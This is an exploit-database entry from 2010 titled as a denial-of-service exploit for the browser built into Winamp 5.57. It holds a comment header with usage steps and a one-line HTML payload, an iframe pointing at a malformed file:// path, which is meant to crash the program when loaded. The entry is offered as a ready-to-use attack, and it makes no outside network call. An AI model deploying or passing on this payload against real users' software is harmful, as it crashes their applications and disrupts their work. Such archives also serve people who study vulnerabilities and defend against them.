id: 11027
date: 02/22/2010
title: Winamp 5.57 (Browser) IE Denial of Service Exploit
author: cr4wl3r
cves: 

==================================================
Winamp 5.57 (Browser) IE Denial of Service Exploit
==================================================

<!--
#[+]---------------------------------------------------------------------------------[+]#
# Winamp 5.57 (Browser) IE Denial of Service Exploit
# Homepage: http://www.winamp.com/
# Exploit Coded by: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
# From: Indonesia
# Tested Win xp(sp2)
# Greetz: no thanks :)
###########################################################
# Usage: change your winamp skin with bento, to open browser press ALT + X
#        drag or load file to browser and keep smile :)
###########################################################
#[+]---------------------------------------------------------------------------------[+]#
##################################### Proud to be Muslim ###################################
 
-->
 
 
<iframe src="file://?:/SOS">
 
 
<!--
 
HACKER CITY GORONTALO INDONESIA
 
-->



#  0day.today [2023-03-21]  #